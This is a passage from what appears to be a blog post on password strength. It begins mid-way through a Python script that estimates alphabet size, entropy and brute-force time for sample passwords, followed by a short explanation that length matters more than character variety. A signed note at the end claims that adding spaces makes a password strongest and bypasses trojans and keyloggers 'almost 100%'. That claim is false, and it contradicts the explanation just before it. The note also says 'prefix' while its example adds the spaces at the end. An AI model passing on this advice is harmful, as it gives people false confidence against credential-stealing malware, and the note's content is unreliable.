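    if classes & {"lower", "upper"}:
        parts.append("letters")
    if "digit" in classes:
        parts.append("numbers")
    if "special" in classes:
        parts.append("special characters")
    if not parts:                      # nothing but spaces
        label = "spaces only"
    elif len(parts) == 1:
        label = parts[0] + " only"
    else:
        label = ", ".join(parts[:-1]) + " and " + parts[-1]
    if "space" in classes and parts:
        label += " (with spaces)"
    return label


def seconds_to_exhaust(password: str, guesses_per_second: float) -> float:
    """Worst-case time for an offline attacker guessing at the given (assumed) rate."""
    return keyspace(password) / guesses_per_second


if __name__ == "__main__":
    # Sample passwords are the ones quoted in the post's list.
    samples = ["secret", "12354", "*%$%@", "a3rf5", "df%g$i", "39*&4", "a#d5y8%"]
    rate = 1e9  # assumed: one billion guesses/s against a fast unsalted hash
    for pw in samples:
        print(f"{pw!r:12} {category(pw):42} alphabet={alphabet_size(pw):3d} "
              f"bits={entropy_bits(pw):5.1f} exhaust={seconds_to_exhaust(pw, rate):.3g}s")
```

    The keyspace grows as alphabet^length, so length matters more than mixing classes: adding a seventh lowercase letter to "secret" multiplies its keyspace by 26, while the three-class "a#d5y8%" owes most of its 42.6 bits to being seven characters long. A space is simply one more symbol in the alphabet and is counted as such.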

    ************************************************************************
    NOTE: Well friends, it is nowhere documented that the most secure password contains [SPACES]. Using spaces in your password will make it the strongest. Using spaces, you can easily bypass trojans & keyloggers (almost 100%). I recommend using 3-4 spaces as a prefix of your password. For example, suppose your password is: "iamsweet123" (without quotes).

    Instead of this password, use "iamsweet123   ". Now what is the difference? Have a closer look. In the latter you will see that it is exactly "iamsweet123[space][space][space]".

    ************************************************************************ 

    ---Regards,
    Amarjit Singh
    read more "Password Types"